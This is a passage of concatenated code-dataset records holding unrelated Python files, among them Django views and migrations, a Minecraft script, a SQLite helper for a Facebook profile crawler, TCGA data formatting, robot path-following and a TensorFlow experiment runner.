###\n op.drop_table('users_ab_testing_assignments')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/150a94ceef02_added_users_ab_testing_assignments_table.py","file_name":"150a94ceef02_added_users_ab_testing_assignments_table.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616225270","text":"import mcpi.minecraft as minecraft\nimport mcpi.block as block\nfrom mcpi.vec3 import Vec3\nmc = minecraft.Minecraft()\n\ndef square(start,size,blk,isHollow):\n \"\"\"Set block as square (start,size,blk,isHollow)\"\"\"\n end = start + Vec3(size, 0, size)\n mc.setBlocks(start,end,blk)\n if isHollow:\n square(start + Vec3(1,0,1), size-2, block.AIR, False)\n mc.postToChat(\"square2 completed.\")\n \nsquare(mc.player.getPos() + Vec3(1,0,1) , 5, block.ACACIA_WOOD, True)","sub_path":"square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"65572584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rubric', '0003_fill_seo'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rubric',\n options={'verbose_name': '\\u0420\\u0443\\u0431\\u0440\\u0438\\u043a\\u0430', 'verbose_name_plural': '\\u0420\\u0443\\u0431\\u0440\\u0438\\u043a\\u0438'},\n ),\n migrations.AlterField(\n model_name='rubric',\n name='tag',\n field=models.OneToOneField(verbose_name='\\u0422\\u044d\\u0433', to='tags.Tag'),\n ),\n ]\n","sub_path":"src/admin_app/rubric/migrations/0004_auto_20151123_1725.py","file_name":"0004_auto_20151123_1725.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599757091","text":"import sqlite3\nimport 
configparser\n\n\nConfig = configparser.ConfigParser()\nConfig.read(\"./../config.ini\")\n# Config.read(\"./config.ini\")\n\nclass DBControl():\n\n def __init__(self):\n self.nomeArquivo = Config.get('DataBase', 'filename') \n self.conn = sqlite3.connect(self.nomeArquivo)\n self.cursor = self.conn.cursor();\n\n self.verifyDatabase();\n\n def verifyDatabase(self):\n exist = False\n linhas = self.cursor.execute(\"\"\"SELECT name FROM sqlite_master WHERE type='table' AND name='pessoas';\"\"\")\n \n for linha in self.cursor.fetchall():\n exist = True\n \n if(not exist):\n self.criarBanco();\n\n def criarBanco(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE pessoas (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n nome TEXT NOT NULL,\n linkFacebook TEXT NOT NULL,\n novo boolean DEFAULT TRUE,\n fotoPerfilAnalisada boolean DEFAULT FALSE\n );\n \"\"\")\n self.novoPerfil(Config.get('FacebookAccount', 'myName') , Config.get('FacebookAccount', 'myPerfil') )\n \n def novoPerfil(self, nome, link):\n if(not self.verificaPerfilExistente(link)):\n self.cursor.execute(\"\"\"INSERT INTO pessoas (nome, linkFacebook) VALUES (?,?)\"\"\", (nome, link) )\n self.conn.commit()\n # self.conn.close()\n\n def getProximoPerfil(self):\n retorno = \"\";\n linhas = self.cursor.execute(\"\"\"SELECT linkFacebook FROM pessoas where novo = 1 limit 1;\"\"\")\n for linha in self.cursor.fetchall():\n retorno = linha[0]\n\n return retorno;\n\n def getProximoPerfilReconhecimento(self):\n retorno = \"\";\n linhas = self.cursor.execute(\"\"\"SELECT linkFacebook, id, nome FROM pessoas where fotoPerfilAnalisada = 0 limit 1; \"\"\")\n for linha in self.cursor.fetchall():\n retorno = linha\n\n return retorno;\n\n def verificaPerfilExistente(self, link):\n linhas = self.cursor.execute(\"\"\"\n SELECT 1 FROM pessoas where linkFacebook = ? 
\n \"\"\", (link,))\n\n if(self.cursor.fetchall() == []):\n return False\n else:\n return True\n\n def atualizarParaBuscando(self, link):\n self.cursor.execute(\"\"\"UPDATE pessoas SET fotoPerfilAnalisada = 1 WHERE linkFacebook = ? \"\"\", [link] )\n self.conn.commit()\n","sub_path":"DBControl.py","file_name":"DBControl.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149031915","text":"#\n# Copyright (c) 2020-2021 Arm Limited and Contributors. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n#\nimport unittest\nfrom mbed_tools.devices._internal.windows.component_descriptor_utils import (\n is_undefined_data_object,\n is_undefined_value,\n data_object_to_dict,\n UNKNOWN_VALUE,\n)\nfrom collections import namedtuple\nimport random\n\n\ndef generate_valid_values():\n return random.choice([\"a test\", 4646.454, 54, True])\n\n\ndef generate_undefined_values():\n return random.choice([0, None, False, UNKNOWN_VALUE])\n\n\nclass TestUtilities(unittest.TestCase):\n def test_is_value_undefined(self):\n self.assertTrue(is_undefined_value(generate_undefined_values()))\n self.assertFalse(is_undefined_value(generate_valid_values()))\n\n def test_is_data_object_undefined(self):\n field_number = 30\n DataObjectType = namedtuple(\"data_object_example\", [f\"field{i}\" for i in range(0, field_number)])\n test1 = DataObjectType(*[generate_undefined_values() for i in range(0, field_number)])\n self.assertTrue(is_undefined_data_object(test1))\n test2 = DataObjectType(*[generate_valid_values() for i in range(0, field_number)])\n self.assertFalse(is_undefined_data_object(test2))\n\n def test_to_dict(self):\n field_number = 30\n DataObjectType = namedtuple(\"data_object_example\", [f\"field{i}\" for i in range(0, field_number)])\n expected_dictionary = {\n f\"field{i}\": random.choice([generate_valid_values(), generate_undefined_values()])\n for i in range(0, field_number)\n 
}\n test = DataObjectType(**expected_dictionary)\n self.assertDictEqual(data_object_to_dict(test), expected_dictionary)\n","sub_path":"tests/devices/_internal/windows/test_component_descriptor_utils.py","file_name":"test_component_descriptor_utils.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613611377","text":"from atmPy.general import timeseries as _timeseries\nfrom atmPy.general import flightpath as _flightpath\nimport xarray as xr\nimport pandas as pd\nimport metpy\nimport metpy.calc\n\nclass BalloonSounding(object):\n def __init__(self, data, column_lat='Lat', column_lon='Lon', column_altitude='Altitude'):\n if isinstance(data, xr.core.dataarray.Dataset):\n self.data = data\n else:\n # some old code ...not sure how valuable\n self.timeseries = _timeseries.TimeSeries(data)\n self.vertical_profile = self.timeseries.convert2verticalprofile()\n self.flight_path = _flightpath.FlightPath(self.timeseries, column_lat=column_lat, column_lon=column_lon, column_altitude=column_altitude)\n \n self._tpw = None\n \n \n @property\n def precipitable_water(self):\n if isinstance(self._tpw, type(None)):\n \n dser = pd.Series(index = self.data.site, dtype=float)\n \n for site in self.data.site:\n ds_sel = self.data.sel(site = site)\n # ds_sel = ds_sel.dropna('index') # just to double check, this made no difference\n pressure = ds_sel.pressure * metpy.units.units.hPa\n dewpoint = ds_sel.dewpoint * metpy.units.units.degC\n tpw = metpy.calc.precipitable_water(pressure, dewpoint)\n tpw = tpw.to('cm')\n dser.loc[str(site.values)] = tpw.magnitude\n \n datpw = dser.to_xarray()\n datpw = datpw.rename({'index': 'site'})\n datpw.attrs['unit'] = 'cm'\n self._tpw = datpw\n return self._tpw","sub_path":"atmPy/atmosphere/sounding.py","file_name":"sounding.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"253604436","text":"from django.shortcuts import render, redirect, reverse, HttpResponse\nfrom django.contrib import auth, messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserLoginForm, UserRegistrationForm \nfrom django.contrib.auth import get_user_model\n\n# Create your views here.\ndef index(request):\n return render(request, \"accounts/index.template.html\")\n \ndef logout(request):\n auth.logout(request)\n messages.success(request, \"You have successfully logged out\")\n return redirect(reverse(\"index\"))\n \ndef login(request):\n #returns login page\n if request.method == \"POST\":\n login_form = UserLoginForm(request.POST)\n \n if login_form.is_valid():\n user = auth.authenticate(username=request.POST[\"username\"], password=request.POST[\"password\"])\n \n \n if user:\n auth.login(user=user, request=request)\n messages.success(request, \"You have successfully logged in.\")\n return redirect(reverse(\"index\"))\n else:\n # login_form.add_error(None, \"Invalid username or password\")\n messages.error(request, \"Invalid username or password\")\n return render(request, \"accounts/login.template.html\", {\n \"form\":login_form\n })\n else:\n login_form = UserLoginForm()\n return render(request, \"accounts/login.template.html\", {\n \"form\":login_form\n })\n \n@login_required\ndef profile(request):\n User = get_user_model()\n user = User.objects.get(email=request.user.email)\n return render(request, 'accounts/profile.template.html', {\n 'user' : user\n })\n\n \ndef register(request):\n User = get_user_model()\n if request.method == 'POST':\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n \n form.save()\n \n user = auth.authenticate(username=request.POST['username'],\n password=request.POST['password1'])\n \n if user:\n \n auth.login(user=user, request=request)\n messages.success(request, \"You have successfully registered\")\n else:\n messages.error(request, \"Unable to register your account 
at this time\")\n return redirect(reverse('index'))\n \n else:\n return render(request, 'accounts/register.template.html', {\n 'form':form\n })\n else:\n \n form = UserRegistrationForm()\n return render(request, 'accounts/register.template.html', {\n 'form':form\n })","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616936289","text":"# inf = 1/0\n\nnumerator = 1000\ndenominator = 0\n\n#EXCEPTIONS\nprint(\" --- EXCEPTIONS --- \")\n\ntry:\n result_div = numerator / denominator\nexcept NameError:\n print(\" /_\\ numerator or denominator has not been defined\")\nexcept TypeError:\n print(\" /_\\ numerator or denominator variable type is not compatible with division\")\nexcept ZeroDivisionError:\n print(\" /_\\ Are you really trying to divide by zero ?\")\nelse:\n print(result_div)\n\n#ASSERTS\nprint(\" --- ASSERTS --- \")\nyear = \"two thousand twelwe\" #-2012\n\ntry:\n year = int(year) # Conversion de l'année\n assert year > 0\nexcept ValueError:\n print(\"You must enter a number\")\nexcept AssertionError:\n print(\"The year is negative !\")\n\n#RAISE AN EXCEPTION\nprint(\" --- RAISE AN EXCEPTION --- \")\n\nyear = -10\n\ntry:\n year = int(year)\n if year <= 0:\n print(\"condition verified...\")\n raise ValueError(\"Year is negative\")\nexcept ValueError:\n #print(ValueError)\n print(\"Value is not valid.\")\n\n# EXCEPTION HIERARCHY\n# Exceptions are not only classes but they also have a hierarchy according to a precise heritage scheme. 
To know more about it look at heritage.py\n","sub_path":"exceptions_and_asserts.py","file_name":"exceptions_and_asserts.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"16025169","text":"#!/usr/bin/env pybricks-micropython\n\nfrom pybricks.hubs import EV3Brick\n\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\n InfraredSensor, UltrasonicSensor, GyroSensor)\n\nfrom pybricks.parameters import Port, Stop, Direction, Button, Color\n\nfrom pybricks.tools import wait, StopWatch, DataLog\n\nfrom pybricks.robotics import DriveBase\n\nfrom pybricks.media.ev3dev import SoundFile, ImageFile\n\n\n# Made by HandsonTechnology \n# This program requires LEGO EV3 MicroPython v2.0 or higher.\n# Click \"Open user guide\" on the EV3 extension tab for more information.\n\n# Create your objects here.\nev3 = EV3Brick()\n\n#Write your program here.\n\n#Hello 라고 말한다.\nev3.speaker.say('Hello')\n\n#기본 비프음을 1번 재생한다.\nev3.speaker.beep()\n\n#20 ms 기다린다. 
(쉼표의 개념)\nwait(20)\n\n#1500 Hz의 주파수를 1000 ms 동안 재생한다.\nev3.speaker.beep(1500,1000)\n\n#EV3 에 내장된 파일을 재생한다.\nev3.speaker.play_file(SoundFile.EV3)\n\n\n\ndo = 523\nre = 587\nmi = 659\n\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(re, 500)\nwait(20)\nev3.speaker.beep(do, 500)\nwait(20)\nev3.speaker.beep(re, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\nev3.speaker.beep(mi, 500)\nwait(20)\n\n\n\n\n\nbrick.display.text('World') #World 제일 위에 표시\nwait(1000)\nbrick.display.clear() #디스플레이 지우기\nbrick.display.text('Hello',(60, 50)) #(60,50) 위치에 Hello 표시 \nwait(1000)\nbrick.display.image(ImageFile.LEFT) #LEFT 이미지 표시\nwait(1000)\n","sub_path":"hubs/01-speaker.py","file_name":"01-speaker.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247549677","text":"import json\nimport Ex1 \n\nInputfile = open('HomeworkTextFile.txt','r')\npathlist = (Inputfile.read()).split('\\n')\nnamelist = [Ex1.ExtractFileName(i) for i in pathlist]\npathlist = [{'path': i} for i in pathlist]\nnamelist = [{'file_name': i} for i in namelist]\npathlist=[dict(pathlist[i],**namelist[i]) for i in range(len(pathlist))]\nwith open('path.json','w') as of:\n json.dump(pathlist,of)\n","sub_path":"Week 1/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392247106","text":"import math\n\nfrom path_following.config import NODE_SIZE\nfrom path_following.destination import Destination\nfrom path_following.movement_mode import MovementMode\n\n\nclass Vectorizer:\n def __init__(self, minimize=False):\n self.robot_position = None\n self.robot_angle = None\n self.minimize = minimize\n self.path = []\n self.mode = MovementMode.GRIP\n self.cm_to_pixel = 6.882391855\n self.distance_correction_threshold = 3*self.cm_to_pixel\n 
self.length_correction_threshold = 0\n self.angle_correction_threshold = 0\n self.checkpoint_trigger_threshold = 55\n self.last_checkpoint = None\n self.goal = None\n self.checkpoint = None\n\n self.destination = Destination.OTHER\n\n self.objective = None\n\n def set_mode(self, mode: MovementMode):\n self.mode = mode\n\n def set_destination_mode(self, destination: Destination):\n self.destination = destination\n\n def set_robot_position(self, position: (int, int)):\n self.robot_position = position\n\n # update checkpoint\n node_distances = [\n i for i, node in enumerate(self.path) if distance(self.robot_position, node) <= self.checkpoint_trigger_threshold\n ]\n # node_distances = [\n # i for i, node in enumerate(self.path) if self.robot_position[0] >= node[0] or distance(self.robot_position, node) <= 50\n # ]\n if node_distances:\n if self.checkpoint is None or node_distances[-1] > self.checkpoint:\n self.checkpoint = node_distances[-1]\n\n def set_path(self, path: [(float, float)]):\n # if self.destination is Destination.PUCK:\n path = self.shorten_path_to_grab_puck(path)\n self.path = self.minimize_path(path)\n # # if self.destination is Destination.PUCK or self.destination is Destination.CORNER:\n # # else:\n # # self.path = path\n self.objective = None\n self.checkpoint = None\n\n def minimize_path(self, path: [[float, float]]):\n if path and len(path) > 1:\n minimized_path = [path[0]]\n elif len(path) == 1:\n path = [self.robot_position, path[0]]\n current_angle = math.atan2(path[1][1] - path[0][1], path[1][0] - path[0][0])\n for i, node in enumerate(path[2:-1]):\n x, y = node\n\n x2, y2 = path[i+1]\n angle_between_last_one = math.atan2(y-y2, x-x2)\n\n if angle_between_last_one == current_angle:\n current_angle = angle_between_last_one\n continue\n current_angle = angle_between_last_one\n minimized_path.append((x2, y2))\n\n if path[-1] != minimized_path[-1]:\n minimized_path.append(path[-1])\n return minimized_path\n\n def shorten_path_to_grab_puck(self, 
path: [(float, float)]):\n distances = [distance(node, self.goal) for node in path]\n new_path = []\n for i, distance_from_goal in enumerate(distances):\n new_path.append(path[i])\n if distance_from_goal <= 112:\n break\n return new_path\n\n def set_goal(self, goal: (int, int)):\n self.goal = goal\n\n def set_destination(self, destination: Destination):\n self.destination = destination\n\n def minimize_vectors(self, vectors: [[float, float]]):\n minimized_vectors = []\n for i, vector in enumerate(vectors):\n length, angle = vector\n if angle != 0:\n minimized_vectors.append(vector)\n elif angle == 0:\n if not minimized_vectors:\n minimized_vectors.append(vector)\n else:\n last_vector_distance, last_vector_angle = minimized_vectors[-1]\n minimized_vectors[-1] = [last_vector_distance + length, last_vector_angle]\n return minimized_vectors\n\n def get_path_from_robot(self, nodes: [(float, float)]):\n if self.checkpoint is None:\n self.checkpoint = 0\n\n node_distances = [\n distance(self.robot_position, node)\n for node in nodes[self.checkpoint+1:]\n ]\n\n if not node_distances:\n return [self.robot_position]\n\n minimum_distance = min(node_distances)\n index = node_distances.index(minimum_distance) + self.checkpoint + 1\n\n self.objective = nodes[index]\n if self.robot_is_close_to_path(minimum_distance):\n if self.checkpoint_was_updated_recently():\n return nodes[self.checkpoint+1:]\n else:\n return nodes[index:]\n else:\n return nodes[index:]\n\n def checkpoint_was_updated_recently(self):\n return distance(self.robot_position, self.path[self.checkpoint]) <= NODE_SIZE\n\n def robot_is_close_to_path(self, minimum_distance_from_path):\n return minimum_distance_from_path <= self.distance_correction_threshold\n\n def vectorize(self, nodes: [(float, float)]):\n vectors = []\n for i in range(len(nodes)-1):\n x1, y1 = nodes[i]\n x2, y2 = nodes[i+1]\n length = ((x2-x1)**2 + (y2-y1)**2)**0.5\n angle = -math.atan2(y2-y1, x2-x1)\n\n if angle == -0:\n angle = 0\n elif angle == 
-math.pi:\n angle = math.pi\n\n vector = [length, angle]\n vectors.append(vector)\n return vectors\n\n def adjust_vector_angles_from_robot_pov(self, vectors: [[float, float]]):\n \"\"\"\n Changes the vectors' orientation from their absolute value from the top camera\n to the angle the robot will need to use to align itself with the vector.\n (For all vectors)\n \"\"\"\n new_vectors = []\n if self.mode is MovementMode.OHMMETER:\n last_vector = [None, self.robot_angle - math.pi/2]\n else:\n last_vector = [None, self.robot_angle]\n\n for vector in vectors:\n length, angle = self.adjust_vector_angle_from_robot_pov(last_vector, vector)\n if abs(angle) <= self.angle_correction_threshold:\n angle = 0\n if abs(length) <= self.length_correction_threshold:\n length = 0\n new_vectors.append([length, angle, self.mode])\n last_vector = vector\n return new_vectors\n\n def adjust_vector_angle_from_robot_pov(self, robot_angle, vector_angle):\n \"\"\"\n Changes the vector orientation from the absolute value from the top camera\n to the angle the robot will need to use to align itself with the vector.\n (For one vector)\n \"\"\"\n if vector_angle< 0:\n vector_angle = 2 * math.pi +vector_angle\n if robot_angle< 0:\n robot_angle = 2 * math.pi + robot_angle\n\n angle_correction = vector_angle - robot_angle\n\n if angle_correction > math.pi:\n angle_correction -= 2 * math.pi\n elif angle_correction < -math.pi:\n angle_correction += 2 * math.pi\n return angle_correction\n\n def set_robot_angle(self, robot_angle):\n self.robot_angle = robot_angle\n\n def path_to_vectors(self):\n path_from_robot = self.get_path_from_robot(self.path)\n\n if self.destination is Destination.PUCK or self.destination is Destination.CORNER:\n tuple_length_angle = self.calculate_distance_and_angle()\n return [(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n\n elif self.destination is Destination.RESISTANCE_STATION:\n tuple_length_angle = self.calculate_distance_and_angle()\n return 
[(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n else:\n tuple_length_angle = self.calculate_distance_and_angle()\n return [(tuple_length_angle[0], tuple_length_angle[1], MovementMode.GRIP)]\n\n def calculate_distance_and_angle(self):\n if self.objective is not None:\n xp, yp = self.robot_position\n xg, yg = self.objective\n\n length = ((xg-xp)**2 + (yg-yp)**2)**0.5\n\n angle_correction = self.find_goal_angle(yg - yp, xg- xp, self.destination)\n\n return length, angle_correction\n else:\n raise Exception(\"wtf, objective is none\")\n\n def find_goal_angle(self, diff_y, diff_x, destination):\n angle = -math.atan2(diff_y, diff_x)\n if angle == -0:\n angle = 0\n elif angle == -math.pi:\n angle = math.pi\n\n if angle < 0:\n angle = 2 * math.pi + angle\n if self.robot_angle < 0:\n self.robot_angle = 2 * math.pi + self.robot_angle\n\n angle_correction = angle - self.robot_angle\n\n if angle_correction > math.pi:\n angle_correction -= 2 * math.pi\n elif angle_correction < -math.pi:\n angle_correction += 2 * math.pi\n\n if destination == \"RESISTANCE\":\n angle_correction -= math.pi/2\n elif destination == \"CENTER\":\n pass\n else:\n pass\n\n return angle_correction\n\n def robot_is_on_goal(self):\n \"\"\"\n # TODO:\n We don't do a final angle correction if robot_is_on_goal because it will always want to correct the\n angle to 0 degrees. 
We can actually try to toggle this on/off in the lab to see the robot's\n actual behavior.\n \"\"\"\n return distance(self.robot_position, self.goal) <= NODE_SIZE/2\n\n\ndef distance(point1, point2):\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt(pow(x2-x1, 2) + pow(y2-y1, 2))\n","sub_path":"station/path_following/path_following/vectorizer.py","file_name":"vectorizer.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"356980622","text":"#TCGAFormat.py\n#This program will format miRNA_seq, CNA, and mutation data to be MOCA compatible.\nimport glob\n\ndef format_data(adjust_id, adjust_gene, space):\n #opens file\n infilename = input(\"Enter file name: \")\n raw_data = open(infilename, \"r\")\n raw_data_list = raw_data.readlines()\n raw_data_length = len(raw_data_list) #number of lines in the text file\n\n #creates new file\n formatted_data = open(infilename[:len(infilename)-8], \"w\")\n print(infilename[:len(infilename)-8])\n \n #formats patient ID\n if (space == 1):\n patient_id_list = raw_data_list[0].split()\n else:\n patient_id_list = raw_data_list[0].split(\"\\t\")\n \n for i in range(adjust_id): #removes gene symbol, locus ID, and cytoband to make it MOCA friendly\n patient_id_list.pop(0)\n patient_list_length = len(patient_id_list)\n for i in range(patient_list_length): #writes the formatted ID to the file\n formatted_data.write(patient_id_list[i][:12]+\" \") #data is tab delimited\n formatted_data.write(\"\\n\")\n\n #formats gene data\n for i in range(1, raw_data_length):\n gene_data_list = raw_data_list[i].split(\"\\t\")\n for j in range(adjust_gene): #removes locus ID and cytoband to make it MOCA friendly\n gene_data_list.pop(1)\n for j in range(len(gene_data_list)): #writes feature along with its data members to the file\n gene_data_list[j] = gene_data_list[j].strip(\"\\n\")\n formatted_data.write(gene_data_list[j]+\" \") #data is tab delimited\n 
formatted_data.write(\"\\n\")\n\ndef format_mutation():\n formatted_data = open(\"LAMLMutation\", \"w\")\n features = []\n for infilename in glob.glob('./LAML/MutationCallsLevel3/*.txt'):\n formatted_data.write(infilename[27:39]+\" \")\n raw_data = open(infilename, \"r\")\n tempfeatures = [Line.split()[0] for Line in raw_data][1:]\n features = features + tempfeatures\n raw_data.close()\n formatted_data.write(\"\\n\")\n print(\"With Duplicates: \", len(features))\n features = list(set(features))\n features = sorted(features)\n print(\"Without Duplicates: \", len(features))\n\n print(features[1:100])\n print('\\n')\n print('\\n')\n\n for feature in features:\n print(\"Testing:.... \", feature)\n formatted_data.write(feature + \" \")\n\n for infilename in glob.glob('./LAML/MutationCallsLevel3/*.txt'):\n #print(feature, \"\\t\", infilename)\n raw_data = open(infilename, \"r\")\n features_infile = [Line.split()[0] for Line in raw_data][1:]\n\n raw_data.seek(0, 0)\n if feature in features_infile:\n indices = [i for i, x in enumerate(features_infile) if x == feature]\n raw_data_list = raw_data.readlines() \n mutationCount = 0\n \n for index in indices:\n #print(feature, \" is in the file @ index: \", index+1) \n line_index = raw_data_list[index+1]\n line_index = line_index.split(\"\\t\")\n #print(line_index)\n \n if (line_index[8] != \"Silent\"):\n mutationCount = mutationCount + 1\n \n formatted_data.write(str(mutationCount) + \" \")\n \n else:\n formatted_data.write(\"0\"+\" \")\n raw_data.close()\n\n #print('\\n')\n formatted_data.write(\"\\n\")\n\n \n#main\ndef main():\n data_type = input(\"Enter the type of data that is being formatted (mRNA, miRNA, CNA, or Mutation): \")\n if (data_type == \"mRNA\"):\n format_data(2, 0, 1)\n elif (data_type == \"miRNA\"):\n format_data(2, 0, 1)\n elif (data_type == \"CNA\"):\n format_data(3, 2, 0)\n elif (data_type == \"Mutation\"):\n 
format_mutation()\n\n\n\nmain()\n","sub_path":"TCGA/TCGAFormat.py","file_name":"TCGAFormat.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"44990001","text":"from back_office.banco import depositar_monto_en_cuenta_de_usuario\nfrom django.contrib.auth.models import User\nimport logging\n\nlog = logging.getLogger(__name__)\n\n__author__ = 'bryan'\n\n\n\nclass PlanCompensacionSeis():\n NUMERO_PLAN = 6\n\n def __init__(self):\n log.info(\"Creating %s\" % self.__class__)\n user_admin = User.objects.get(is_superuser=1)\n if not user_admin:\n log.error(\"No puedo crear el Plan No. 6. Usuario admin no encontrado\")\n raise \"No puedo crear el Plan No. 6. Usuario admin no encontrado\"\n\n def asignar_beneficios_usuarios(self, beneficios):\n log.info(\"Plan %s: BENEFICIOS DE EMPRESA 1%. Asignando beneficios.\" % self.NUMERO_PLAN)\n users = User.objects.all()\n por_ciento = beneficios * 1 / 100\n for user in users:\n if user.perfilusuario.membresia.tipo_membresia.id > 1:\n depositar_monto_en_cuenta_de_usuario(user.id, por_ciento, self.NUMERO_PLAN)\n log.info(\"Plan %s: Beneficios asignados exitosamente...\" % self.NUMERO_PLAN)\n","sub_path":"back_office/planes/compensacion6.py","file_name":"compensacion6.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"267739068","text":"import tensorflow as tf\nfrom utils.utils import get_args\nfrom utils.config import process_config\nfrom utils.config import get_config_from_json\nfrom utils.factory import create\nfrom utils.dirs import create_dirs\nfrom utils.logger import Logger\nfrom utils.copy_codebase_new import copy_codebase\nimport os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"True\"\n\n\ndef run_multi():\n # Get the arguments\n args = get_args()\n config, _ = 
get_config_from_json(args.config)\n values_xx = config.exp.vals_0\n values_zz = config.exp.vals_0\n params = config.exp.params\n section = config.exp.section\n # Spectral Normalization\n for i in values_xx:\n # Mode\n for j in values_zz:\n\n config[section][params[0]] = i\n config[section][params[1]] = j\n config.exp.name = args.experiment + \"_{}_{}\".format(i, j)\n process_config(config)\n create_dirs(\n [\n config.log.summary_dir,\n config.log.checkpoint_dir,\n config.log.step_generation_dir,\n config.log.log_file_dir,\n config.log.codebase_dir,\n ]\n )\n # Copy the model code and the trainer code to the experiment folder\n run(config, args)\n tf.reset_default_graph()\n # Delete the session and the model\n\n\ndef run(config, args):\n copy_codebase(config)\n\n l = Logger(config)\n logger = l.get_logger(__name__)\n # Set the random seed\n tf.random.set_seed(config.data_loader.random_seed)\n # Create the tensorflow session\n sess = tf.Session()\n # Create the dataloader\n data = create(\"data_loader.\" + config.data_loader.name)(config)\n # Create the model instance\n model = create(\"models.new.\" + config.model.name)(config)\n # Create the summarizer Object\n summarizer = create(\"utils.\" + config.log.name)(sess, config)\n # Create the trainer\n trainer = create(\"trainers.\" + config.trainer.name)(sess, model, data, config, summarizer)\n # Load model if exists\n model.load(sess)\n # Train the model\n if args.train:\n trainer.train()\n # Test the model\n if config.trainer.test_at_end:\n trainer.test()\n logger.info(\"Experiment has ended.\")\n\n\nif __name__ == \"__main__\":\n run_multi()\n","sub_path":"scripts/running/run_on_titan_parameters_new.py","file_name":"run_on_titan_parameters_new.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"355439933","text":"# encoding: utf-8\n\nfrom ore.yuiwidget.table import BaseDataTableFormatter\n\nfrom bungeni.ui import 
container \nfrom bungeni.ui import common\nfrom bungeni.ui.i18n import _\nfrom zope.i18n import translate\nfrom zope.security import proxy\nfrom zc.resourcelibrary import need\nfrom zc.table import batching\n\nfrom z3c.pt.texttemplate import ViewTextTemplateFile\nfrom bungeni.ui.utils import url\n\nclass TableFormatter(batching.Formatter):\n \"\"\"The out-of-box table formatter does not let us specify a custom\n table css class.\n \n !+ This is currently being used by the Actions workflow and versions views:\n bungeni/ui/versions.py\n bungeni/ui/workflow.py\n \"\"\"\n \n table_css_class = \"listing grid\"\n \n def __call__(self):\n return (\n '''\n
\n \n %s\n
\n %s\n
''' % (self.table_css_class, self.prefix,\n self.renderContents(), self.renderExtra())\n )\n\nclass ContextDataTableFormatter(BaseDataTableFormatter):\n script = ViewTextTemplateFile(\"templates/datatable.pt\")\n \n data_view =\"/jsonlisting\"\n prefix = \"listing\"\n \n def getFields(self):\n return container.getFields(self.context)\n\n def getFieldColumns(self):\n # get config for data table\n column_model = []\n field_model = []\n\n for field in self.getFields():\n key = field.__name__\n title =translate(_(field.title), context=self.request)\n coldef = {'key': key, 'label': title, 'formatter': self.context.__name__ }\n if column_model == []:\n column_model.append(\n \"\"\"{label:\"%(label)s\", key:\"sort_%(key)s\", \n formatter:\"%(formatter)sCustom\", sortable:true, \n resizeable:true ,\n children: [ \n\t { key:\"%(key)s\", sortable:false}]}\"\"\" % coldef\n )\n else:\n column_model.append(\n \"\"\"{label:\"%(label)s\", key:\"sort_%(key)s\", \n sortable:true, resizeable:true,\n children: [ \n\t {key:\"%(key)s\", sortable:false}]\n }\"\"\" % coldef\n )\n field_model.append('{key:\"%s\"}' % (key))\n return ','.join(column_model), ','.join(field_model)\n \n def getDataTableConfig(self):\n config = {}\n config['columns'], config['fields'] = self.getFieldColumns()\n config['data_url'] = self.getDataSourceURL()\n config['table_id'] = self.prefix\n config['link_url'] = url.absoluteURL(self.context, self.request)\n config['context_name'] = self.context.__name__\n return config\n \n def __call__(self):\n need('yui-datatable')\n need('yui-paginator')\n need('yui-dragdrop')\n \n return '
\\n\\n%s
\\n%s
